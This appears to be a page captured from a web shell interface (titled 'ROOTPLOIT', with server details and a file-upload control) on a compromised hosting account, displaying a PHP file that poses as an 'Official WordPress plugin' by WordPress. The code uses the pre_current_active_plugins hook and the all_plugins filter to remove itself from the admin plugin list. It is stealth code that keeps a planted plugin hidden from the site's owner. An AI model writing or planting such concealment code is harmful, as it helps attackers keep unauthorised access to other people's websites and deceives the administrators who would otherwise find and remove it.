ROOTPLOIT
Server: LiteSpeed
System: Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: niphet (1079)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: /home/niphet/www/wp-content/plugins/wp-genitourinary-app/wp-genitourinary-app.php
<?php
/*
Plugin Name: WP Genitourinary App
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 6.0.2
Author URI: http://wordpress.org/#
License: GPL2
*/

function tmy_tqe()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-genitourinary-app/wp-genitourinary-app.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function vdd_obc($plugins)
{
    $u = 'wp-genitourinary-app/wp-genitourinary-app.php';
    if (array_key_exists($u, $plugins)) {
        unset($plugins[$u]);
    }
    return $plugins;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'tmy_tqe');
    add_filter('all_plugins', 'vdd_obc');
}